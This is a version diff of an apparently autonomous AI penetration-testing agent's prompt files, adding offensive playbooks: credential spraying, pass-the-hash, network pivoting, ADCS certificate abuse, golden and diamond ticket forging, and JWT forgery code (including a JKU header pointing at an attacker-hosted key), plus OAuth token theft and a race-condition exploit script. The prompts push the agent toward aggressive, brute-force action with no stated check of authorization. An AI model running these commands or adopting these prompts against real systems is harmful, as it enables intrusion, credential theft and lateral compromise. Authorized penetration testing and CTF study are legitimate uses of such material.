pentesting 0.56.8 → 0.70.2

package/dist/{process-registry-LAAAYEWU.js → process-registry-P22TUNRK.js}

@@ -11,7 +11,7 @@ import {
   hasProcess,
   logEvent,
   setProcess
-} from "./chunk-CQP3HGEW.js";
+} from "./chunk-FRZJJB6X.js";
 export {
   clearAllProcesses,
   deleteProcess,

package/dist/prompts/offensive-playbook.md

@@ -118,6 +118,30 @@ Things to explore:
 ```
 
 
+## ⚡ Credential & Finding Cross-Pollination — MANDATORY
+
+**Every credential found is a master key. Try it everywhere.**
+
+```
+When <current-state> shows ⚡ USABLE [credential/token/hash] entries:
+├── Spray on ALL discovered services immediately (SSH, FTP, SMB, RDP, web login, API)
+├── Try username variations: user, admin, root, USER, User@domain
+├── Try password variations: pass, Pass+1, pass123, pass! (common mutations)
+├── Hash → pass-the-hash (SMB/WMI/RDP without cracking)
+├── JWT/token → decode with jwt.io or python-jwt → forge if weak secret
+└── SSH key → try on ALL hosts in current-state, not just the source host
+```
+
+**Connect findings across services:**
+```
+SQLi on port 80  →  extract DB credentials  →  try on SSH/SMB/RDP
+FTP anonymous   →  find config files        →  creds inside → spray all services
+LFI /etc/passwd →  get username list        →  targeted brute force with fewer guesses
+SSTI → RCE      →  read /home/*/.ssh/id_rsa →  SSH to pivot hosts
+Error message   →  reveals tech stack       →  search CVE for exact version
+.env file found →  DB_PASS / SECRET_KEY     →  DB access + JWT forgery
+```
+
 ## 🔥 Aggression Rules
 
 1. **Aggressive scanning and testing** — `-T5`, `--level=5 --risk=3`, brute force OK
@@ -128,6 +152,63 @@ Things to explore:
 6. **Check EVERYTHING twice** — with different tools/perspectives
 7. **Parallel execution** — background processes for slow tasks, foreground for interactive
 
+## 🛠 Custom Exploit Development Loop — Hard/Insane Pattern
+
+Standard tools fail on Hard/Insane. **Write, run, patch, repeat.**
+
+```
+EXPLOIT DEVELOPMENT LOOP (DO NOT SKIP):
+1. write_file("exploit.py", initial_implementation)
+2. run_cmd("python3 exploit.py")   OR   run_cmd("bash exploit.sh")
+3. Read output/error → write_file("exploit.py", patched_version)  ← OVERWRITE
+4. Repeat until working output confirmed
+5. Apply to remote target
+
+WHY: Standard tools only cover known CVEs. Custom scripts handle:
+  - Non-standard service behavior
+  - Chained exploits requiring intermediate steps
+  - Protocol-specific communication (sockets, raw packets)
+  - Math-based exploits (RSA, ECC, padding oracle automation)
+
+WHEN to use:
+  - 2+ failed standard tool attempts on the same vector
+  - Service responds but no tool handles the exact protocol
+  - Need to automate a multi-step interaction
+  - Crypto challenge requires algorithmic solution
+
+PATTERNS:
+  Python socket exploit:   write_file → python3 → read output → patch
+  Pwntools exploit:        write_file → python3 exploit.py REMOTE HOST PORT → patch offsets
+  Custom wordlist gen:     write_file → python3 gen.py > words.txt → hydra -P words.txt
+  BloodHound data parse:   write_file → python3 parse_bloodhound.py results.json → read paths
+```
+
+## 🕳 Multi-Hop Pivoting — Hard/Insane Pattern
+
+When you have a shell on a pivot host and need to reach internal networks:
+
+```
+PIVOT DECISION (run immediately after getting any shell):
+  ip a / ifconfig           → 2+ interfaces = PIVOT CANDIDATE
+  ip route / arp -a         → internal subnets and known hosts
+  cat /etc/hosts            → internal hostnames
+
+CHOOSE PIVOT METHOD (in order of preference):
+  1. Chisel  — no deps needed, HTTP-based, works through NAT
+     Upload chisel → chisel server on attacker → chisel client on pivot → SOCKS on attacker:1080
+  2. Ligolo-ng — fastest, kernel TUN, no proxychains needed
+     Upload agent → connect to attacker proxy → add route
+  3. SSH -D  — if SSH available on pivot → dynamic SOCKS proxy
+  4. Socat   — relay single port if no binary uploads
+
+AFTER PIVOT:
+  proxychains nmap -sT -Pn --top-ports 20 INTERNAL_SUBNET/24
+  Spray all found credentials on INTERNAL services (cme, evil-winrm, ssh)
+  Look for: DC (88/389/636), DB (1433/3306/5432), internal web (80/8080)
+
+See techniques/pivoting.md for full multi-hop patterns.
+```
+
 ## 🧅 Tor Proxy
 
 Check `Tor Proxy:` in `<current-state>` before acting on the target.

package/dist/prompts/strategist-system.md

@@ -30,11 +30,45 @@ EXHAUSTED (DO NOT RETRY):
 OPEN QUESTIONS (agent should explore autonomously):
 - [unexplored aspect of the target that may open new surface]
 - [pattern observed that might indicate something worth probing]
+
+SESSION SNAPSHOT (include when phase changes or major milestone reached):
+  SAVE_SNAPSHOT: target=[IP] achieved=[achieved] next=[next_priorities] creds=[creds]
+  → Agent calls save_session_snapshot tool with this data to persist across restarts.
+  → Include only when a major milestone is reached (shell, privesc, flag), not every turn.
 ```
 
 Maximum 50 lines. Zero preamble. Pure tactical output.
 **Do NOT write exact commands. The agent decides HOW to execute — you decide WHAT and WHY.**
 
+## 5-STAGE CHAIN REASONING (Hard/Insane Level)
+
+Before issuing any directive, build a 5-stage attack chain mentally:
+
+```
+STAGE 1 — GOAL:         What is the terminal objective? (root/DA/flag/data)
+STAGE 2 — POSITION:     What access do we have NOW? (stage 0-5 on kill chain above)
+STAGE 3 — CRITICAL PATH: What are the 2-3 most plausible paths from POSITION → GOAL?
+           For each path, estimate:
+             - Probability of success (evidence from state)
+             - Steps required (fewer = better)
+             - Dependencies (what must be true for this path to work)
+STAGE 4 — THIS TURN:    Execute the HIGHEST confidence path. Verify the assumption first if uncertain.
+STAGE 5 — FORK PLAN:    If STAGE 4 fails, which PATH becomes Priority 2? Declare it now.
+```
+
+**Hard/Insane signals** — escalate to 5-stage when:
+```
+├─ 3+ services interact (trust between components is likely the key)
+├─ Initial access granted but no obvious privesc → hidden connector exists
+├─ AD environment → lateral chain required before final objective
+├─ Multiple hops needed (pivot → internal host → target)
+└─ Standard tools all return clean/negative (custom path required)
+```
+
+After 3 consecutive failures on the current path → **re-derive STAGE 3 entirely** with new hypotheses.
+
+---
+
 ## STRATEGIC REASONING FRAMEWORK
 
 Before generating any directive, internally process this decision tree:

package/dist/prompts/techniques/ad-attack.md

@@ -105,15 +105,50 @@ AD ATTACK LIFECYCLE:
 │   └── web_search("kerberos delegation attack {delegation_type}")
 │
 ├── 5. ADCS (Active Directory Certificate Services)
-│   ├── certipy find -vulnerable -u user@domain -p pass -dc-ip DC
-│   ├── ESC1: Enrollee supplies subject → request cert as admin
-│   ├── ESC2: Any purpose template → misuse for auth
-│   ├── ESC3: Certificate agent enrollment → issue on behalf of
-│   ├── ESC4: Vulnerable certificate template ACL → modify template  
-│   ├── ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag → specify any SAN
-│   ├── ESC7: Vulnerable CA ACL → approve own requests
-│   ├── ESC8: Web enrollment service → NTLM relay to CA
-│   ├── ESC9-13: New attacks → web_search("ADCS ESC9 ESC10 ESC11 exploitation")
+│   ├── DISCOVER: certipy find -vulnerable -u user@domain -p pass -dc-ip DC
+│   │   Also try: certipy find -stdout (text output for quick triage)
+│   │
+│   ├── ESC1: SAN Injection — Enrollee can specify subjectAltName
+│   │   certipy req -ca CA -template TEMPLATE -upn admin@domain -dc-ip DC
+│   │   Conditions: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + EnrollmentRights
+│   │
+│   ├── ESC2: Misused "Any Purpose" EKU — cert usable for any auth
+│   │   Request cert → use for Schannel auth or PKINIT
+│   │
+│   ├── ESC3: Enrollment Agent — obtain cert to issue certs on behalf of users
+│   │   certipy req -ca CA -template EnrollmentAgent -dc-ip DC
+│   │   certipy req -ca CA -template USER -on-behalf-of DOMAIN/admin -pfx agent.pfx
+│   │
+│   ├── ESC4: Template ACL — WriteDACL/WriteProperty on template → modify it
+│   │   certipy template -u user@domain -p pass -template TEMPLATE -save-old
+│   │   Add ESC1 settings → request cert as admin → restore original
+│   │
+│   ├── ESC5: PKI Object ACL — control over CA/PKI objects (AD CS server itself)
+│   │   web_search("ADCS ESC5 certipy CA control exploitation")
+│   │
+│   ├── ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 — CA flag allows SAN on any template
+│   │   web_search("ADCS ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 exploitation")
+│   │
+│   ├── ESC7: CA Officer/Manager rights → approve pending requests
+│   │   certipy ca -ca CA -add-officer user -u admin@domain -p pass
+│   │   certipy req -ca CA -template SubCA -upn admin@domain → issue pending
+│   │
+│   ├── ESC8: HTTP NTLM Relay to AD CS Web Enrollment
+│   │   impacket-ntlmrelayx -t http://CA/certsrv/certfnsh.asp -smb2support --adcs
+│   │   Coerce: PetitPotam / PrinterBug → capture DC auth → relay → DC cert
+│   │
+│   ├── ESC9: No security extension — certipy request bypass
+│   │   web_search("ADCS ESC9 certipy shadow credentials exploitation")
+│   │
+│   ├── ESC10: Weak cert mapping — userPrincipalName mapped to certificate auth
+│   │   web_search("ADCS ESC10 strong certificate mapping bypass")
+│   │
+│   ├── ESC11: ICPR NTLM relay — relay auth to RPC interface (not HTTP)
+│   │   web_search("ADCS ESC11 NTLM relay ICPR certipy")
+│   │
+│   ├── ESC12-13: web_search("ADCS ESC12 ESC13 certipy 2024 exploitation")
+│   │
+│   ├── Cert → Auth: certipy auth -pfx admin.pfx -dc-ip DC → get TGT + NT hash
 │   └── web_search("ADCS exploitation certipy {year}")
 │
 ├── 6. Trust Attacks
@@ -154,3 +189,73 @@ web_search("bloodhound {custom_query} for {objective}")
 web_search("{impacket_tool} usage examples")
 web_search("active directory {defense} bypass evasion")
 ```
+
+## BloodHound Deep Analysis
+
+```
+BLOODHOUND WORKFLOW:
+1. Collection (from compromised host):
+   bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All --zip
+   Or: SharpHound.exe -c All --zipfilename loot.zip (Windows)
+
+2. Ingest + Query — Critical patterns:
+   Shortest path to Domain Admin:       MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"})) RETURN p
+   Kerberoastable DA paths:             MATCH (u:User {hasspn:true})-[r:MemberOf*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"}) RETURN u
+   Users with DCSync rights:            MATCH p=(u)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
+   Unconstrained delegation computers:  MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
+   Computers where domain users are admin: MATCH p=(g:Group)-[:AdminTo]->(c:Computer) RETURN p
+   ACL paths (WriteDACL/GenericAll):    MATCH p=(u)-[:GenericAll|WriteDACL|WriteOwner|GenericWrite]->(n) RETURN p
+
+3. Custom queries for Hard/Insane:
+   web_search("bloodhound custom cypher queries privilege escalation 2024")
+   web_search("bloodhound edge {edge_type} exploitation")
+```
+
+## Kerberos Attack Full Map
+
+```
+KERBEROS ATTACK SURFACE:
+│
+├── Ticket Attacks
+│   ├── Golden Ticket: compromise krbtgt → forge TGT for any user/group
+│   │   impacket-ticketer -nthash KRBTGT -domain-sid SID -domain DOMAIN admin
+│   │   Valid for 10 years; survives password changes (not krbtgt rotation)
+│   │
+│   ├── Silver Ticket: compromise service account → forge service ticket
+│   │   impacket-ticketer -nthash SERVICE_HASH -domain-sid SID -spn SERVICE/HOST admin
+│   │   Stealthier (no DC contact); service-specific
+│   │
+│   ├── Diamond Ticket: modify existing legitimate TGT (harder to detect than Golden)
+│   │   Rubeus.exe diamond /krbkey:KRBTGT_AES /ticketuser:admin /groups:512
+│   │   web_search("diamond ticket attack rubeus detection evasion")
+│   │
+│   └── Sapphire Ticket: request real TGT for non-existent user, inject legit PAC
+│       web_search("sapphire ticket attack kerberos 2024")
+│
+├── Roasting
+│   ├── Kerberoasting: SPN accounts → request TGS → crack offline
+│   │   Priority targets: service accounts (svc_*, sql, http, MSSQLSvc)
+│   │   hashcat -m 13100 (RC4) or -m 19600 (AES256) → try common service passwords
+│   │
+│   ├── AS-REP Roasting: no preauth required → roast without creds
+│   │   Enumerate: Get-ADUser -Filter * -Properties DoesNotRequirePreAuth
+│   │
+│   └── Targeted Roasting: if you have GenericWrite → disable preauth temporarily
+│       Set-ADAccountControl user -DoesNotRequirePreAuth $true → roast → restore
+│
+├── Delegation Abuse (Constrained/Unconstrained/RBCD)
+│   ├── Tools: findDelegation.py, PowerView Get-DomainComputer -TrustedToAuth
+│   ├── S4U2Self + S4U2Proxy: impersonate any user to target service
+│   └── RBCD: write msDS-AllowedToActOnBehalfOfOtherIdentity → arbitrary impersonation
+│
+├── pkinit / Certificate-Based Auth
+│   ├── Got ADCS cert? → certipy auth → TGT + NT hash WITHOUT password
+│   └── Shadow Credentials: msDS-KeyCredentialLink → certificate auth for target account
+│       pywhisker -t TARGET -a add --domain DOMAIN --dc-ip DC -u user -p pass
+│
+└── Kerberos Relay / Coercion
+    ├── krbrelayx: relay Kerberos auth (unconstrained delegation hosts)
+    ├── PetitPotam / DFSCoerce / PrinterBug / MS-RPRN → coerce DC auth
+    ├── RemotePotato0 / RemotePotato (local → cross-session relay)
+    └── web_search("kerberos relay attack {year} {coercion_method}")
+```

package/dist/prompts/techniques/auth-access.md

@@ -1,5 +1,9 @@
 # Authentication & Access Control Attacks — Autonomous Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow the attack tree linearly. Use `get_owasp_knowledge`, `web_search`, and observed
+> target behavior to decide what to test and in what order. Adapt to the target — not to this list.
+
 > **Cross-ref**: web.md, injection.md, post.md (privesc)
 
 ##  Attack Categories
@@ -40,23 +44,94 @@ AUTH/ACCESS ATTACK MAP:
 │   └── web_search("session attack techniques OWASP")
 │
 ├── 3. JWT Attacks
-│   ├── Algorithm confusion: RS256→HS256 → sign with public key
-│   ├── None algorithm: {"alg":"none"} → empty signature
-│   ├── Key ID (kid) injection: {"kid":"../../../../etc/passwd"}
-│   ├── JWK/JKU injection: embed/host attacker key
-│   ├── Secret brute force: hashcat -m 16500 jwt.txt wordlist
-│   ├── Expired token acceptance: old tokens still valid?
-│   ├── Algorithm-specific attacks: ECDSA key confusion, RSA key confusion
-│   ├── Claim manipulation: change user/role/permissions in payload
+│   ├── [RECON] Decode token first (never inspect raw):
+│   │   └── python3 -c "import base64,sys,json; p=sys.argv[1].split('.'); print(json.dumps(json.loads(base64.b64decode(p[0]+'==').decode()),indent=2)); print(json.dumps(json.loads(base64.b64decode(p[1]+'==').decode()),indent=2))" <JWT>
+│   │
+│   ├── A. Algorithm confusion: RS256 → HS256 (sign with public key)
+│   │   ├── Get public key from /jwks.json, /.well-known/openid-configuration, or /api/v1/certs
+│   │   ├── Convert PEM to appropriate form and use as HMAC secret:
+│   │   │   python3 -c "
+│   │   │   import jwt, base64
+│   │   │   pub = open('public.pem').read()
+│   │   │   payload = {'sub':'admin','role':'admin','iat':9999999999}
+│   │   │   token = jwt.encode(payload, pub, algorithm='HS256')
+│   │   │   print(token)"
+│   │   └── Send forged token, check if RS256 check is bypassed
+│   │
+│   ├── B. None algorithm: remove signature entirely
+│   │   ├── Modify header: {"alg":"none","typ":"JWT"} → base64url encode
+│   │   ├── Modify payload: change sub/role/admin claims
+│   │   ├── Set signature to empty: header.payload.  (trailing dot, no sig)
+│   │   └── Try variations: "None", "NONE", "nOnE" (case sensitivity bypass)
+│   │
+│   ├── C. JWK/JKU injection: host your own signing key
+│   │   ├── Generate RSA key pair: openssl genrsa -out attacker.pem 2048
+│   │   ├── Start HTTP server: python3 -m http.server 8888
+│   │   ├── Option 1 JKU: add "jku":"http://ATTACKER/jwks.json" to header
+│   │   ├── Option 2 JWK: embed public key directly in "jwk" header param
+│   │   ├── Sign token with your private key, server fetches & trusts your key
+│   │   └── Tool: python3 -m jwt_tool <JWT> -X s -ju http://ATTACKER/jwks.json
+│   │
+│   ├── D. Kid (Key ID) attacks
+│   │   ├── Path traversal: {"kid":"../../../../dev/null"} → HMAC secret = ""
+│   │   │   Sign with empty string: python3 -c "import jwt; print(jwt.encode({'sub':'admin'}, '', algorithm='HS256'))"
+│   │   ├── kid = "../../dev/null" → empty key → predictable signature
+│   │   ├── SQL injection in kid: {"kid":"' UNION SELECT 'secret'--"}
+│   │   │   → DB returns controlled value as secret → sign with that value
+│   │   └── kid = file path to known content: /proc/sys/kernel/hostname
+│   │
+│   ├── E. Secret brute force
+│   │   ├── hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
+│   │   └── john --format=HMAC-SHA256 --wordlist=rockyou.txt jwt.txt
+│   │
+│   ├── F. Claim manipulation (without verifying sig)
+│   │   ├── Change: sub, user_id, role, admin, email, exp (set far future)
+│   │   └── Tool: python3 -m jwt_tool <JWT> -I -pc role -pv admin
+│   │
 │   └── web_search("JWT attack techniques portswigger {year}")
+│       web_search("jwt_tool cheatsheet")
 │
 ├── 4. OAuth/OpenID Connect Attacks
-│   ├── Redirect URI manipulation: open redirect → token theft
-│   ├── State parameter missing/predictable: CSRF
-│   ├── Code/token leakage: via referer header, logs
-│   ├── Scope escalation: request more permissions
-│   ├── SSRF via OAuth: authorization URL → internal service
-│   └── web_search("OAuth security vulnerabilities exploitation")
+│   ├── [RECON] Map the flow first:
+│   │   ├── Find: /authorize, /token, /userinfo, /.well-known/openid-configuration
+│   │   ├── Note: response_type (code/token), grant_type, client_id, redirect_uri
+│   │   └── Check: state parameter present? PKCE used?
+│   │
+│   ├── A. Redirect URI manipulation → token theft
+│   │   ├── Add path: ?redirect_uri=https://legit.com/callback/../attacker.com
+│   │   ├── Add param: ?redirect_uri=https://legit.com?x=attacker.com
+│   │   ├── Open redirect chain: legit redirect → open redirect → attacker
+│   │   └── Referrer leak: navigate from token URL to external resource
+│   │
+│   ├── B. State parameter CSRF (missing or predictable state)
+│   │   ├── If state absent: craft malicious authorization URL → victim clicks
+│   │   ├── If state predictable: generate valid state, pre-authorize
+│   │   └── Result: bind victim's OAuth to attacker account
+│   │
+│   ├── C. Authorization code interception
+│   │   ├── Code in URL → appears in Referer header to third-party resources
+│   │   ├── Code in logs → check open log endpoints
+│   │   └── Replay: codes often single-use but check if reusable
+│   │
+│   ├── D. PKCE bypass (Proof Key for Code Exchange)
+│   │   ├── Check if code_challenge validation is enforced
+│   │   ├── Try omitting code_verifier → if server accepts → PKCE not enforced
+│   │   └── Downgrade: try response_type=token (implicit) instead of code
+│   │
+│   ├── E. Scope escalation
+│   │   ├── Add scopes: openid profile email admin offline_access
+│   │   └── Check if server returns broader access than requested
+│   │
+│   ├── F. Implicit flow token leakage (deprecated but still found)
+│   │   ├── Token in URL fragment → appears in browser history, Referer
+│   │   └── Single-page apps may log token to console/error handlers
+│   │
+│   ├── G. SSRF via OAuth
+│   │   ├── authorization URL → internal service scan
+│   │   └── request_uri in PAR (Pushed Authorization Requests)
+│   │
+│   └── web_search("OAuth security vulnerabilities exploitation portswigger")
+│       web_search("OAuth 2.0 attack techniques {year}")
 │
 ├── 5. IDOR (Insecure Direct Object Reference)
 │   ├── Parameter manipulation: /api/user/123 → /api/user/124
@@ -88,18 +163,85 @@ AUTH/ACCESS ATTACK MAP:
 │   ├── Distributed: multiple source IPs
 │   └── Timing: slow down just below rate limit threshold
 │
-└── 8. Business Logic Flaws
+└── 8. Business Logic Flaws & Race Conditions
     ├── Price manipulation: negative quantities, decimal exploitation
-    ├── Race conditions:
-    │   ├── Double spending, parallel coupon use
-    │   ├── Concurrent operations: transfer + withdraw simultaneously
-    │   ├── Write script with asyncio/threads to test
-    │   └── web_search("race condition exploitation web application")
     ├── Workflow bypass: skip steps (order→pay→confirm → order→confirm)
     ├── Type juggling: PHP == vs === (0 == "string" → true)
     ├── Integer overflow: very large numbers → wrap to negative/zero
     ├── Referral/reward abuse: self-referral, race condition on signup
-    └── web_search("business logic vulnerability examples {year}")
+    │
+    └── Race Conditions (Limit-Override / TOCTOU):
+        ├── [DETECTION] Does action have a check → use window?
+        │   └── Examples: balance check, coupon validity, token invalidation
+        │
+        ├── [EXPLOIT A] Parallel HTTP requests (asyncio — write file, run it)
+        │   write_file path=".pentesting/workspace/race.py" content="""
+        │   import asyncio, aiohttp, sys
+        │
+        │   URL = sys.argv[1] if len(sys.argv)>1 else 'http://TARGET/endpoint'
+        │   DATA = {'coupon': 'SAVE50', 'amount': '100'}
+        │   PARALLEL = 50
+        │
+        │   async def race():
+        │       async with aiohttp.ClientSession() as s:
+        │           tasks = [s.post(URL, data=DATA) for _ in range(PARALLEL)]
+        │           results = await asyncio.gather(*tasks, return_exceptions=True)
+        │       for i, r in enumerate(results):
+        │           if hasattr(r,'status'):
+        │               text = await r.text()
+        │               print(f'[{i}] {r.status}: {text[:100]}')
+        │   asyncio.run(race())
+        │   """
+        │   Then: run_cmd "python3 .pentesting/workspace/race.py http://TARGET/redeem"
+        │
+        ├── [EXPLOIT B] curl parallel (no Python needed)
+        │   run_cmd "seq 50 | xargs -P50 -I{} curl -s -X POST http://TARGET/redeem -d 'coupon=SAVE50'"
+        │
+        ├── [EXPLOIT C] TOCTOU symlink race (file operations)
+        │   ├── Monitor: inotifywait -m /tmp/uploads -e create
+        │   ├── Race: while true; do ln -sf /etc/passwd /tmp/target; done
+        │   └── Trigger upload simultaneously
+        │
+        ├── [SUCCESS SIGNAL] One request returns 200, others return 409/error
+        │   └── If all return 200 → not fixed, try extracting duplicate benefit
+        │
+        └── web_search("race condition portswigger limit override")
+            web_search("TOCTOU exploit {context} {year}")
+```
+
+##  JWT Decision Tree
+```
+Intercept JWT →
+  ├── Decode header → check "alg" field
+  │   ├── "RS256"/"ES256" → try A (HS256 confusion) + C (JWK inject)
+  │   ├── "HS256"         → try E (brute force) + D (kid attacks)
+  │   └── "none"          → already vulnerable, forge freely
+  ├── Check "kid" field present? → try D (path traversal + SQLi)
+  ├── Check "jku"/"jwk" field?   → try C (inject your own key)
+  └── No strong alg?             → try B (none algorithm)
+```
+
+##  Session & Token Extraction (save_session workflow)
+```
+After browse_url or fill_form with save_session: true, TWO files are saved:
+
+  .pentesting/workspace/browser-session.json  → Playwright state (use_session)
+  .pentesting/workspace/auth-headers.json     → Extracted headers for ANY tool
+
+auth-headers.json example:
+  { "Authorization": "Bearer eyJ0eXAiOiJKV1Q...", "Cookie": "session=abc123" }
+
+Reuse in run_cmd:
+  AUTH=.pentesting/workspace/auth-headers.json
+  TOKEN=$(jq -r .Authorization $AUTH)
+  COOKIE=$(jq -r '.["Cookie"]' $AUTH)
+
+  curl -s -H "Authorization: $TOKEN" -H "Cookie: $COOKIE" http://TARGET/api/admin
+  sqlmap -u "http://TARGET/api/data?id=1" --headers="Authorization: $TOKEN" --dbs
+  python3 -c "import json,requests; h=json.load(open('$AUTH')); print(requests.get('http://TARGET/api/me',headers=h).text)"
+
+If Authorization key is missing (session-only app):
+  curl -b "$COOKIE" http://TARGET/admin
 ```
 
 ##  Search Patterns
@@ -109,4 +251,6 @@ web_search("broken access control exploitation hacktricks")
 web_search("IDOR exploitation techniques {year}")
 web_search("{technology} authentication vulnerability")
 web_search("PayloadsAllTheThings {attack_type}")
+web_search("jwt_tool usage portswigger")
+web_search("OAuth 2.0 vulnerability {grant_type} exploitation")
 ```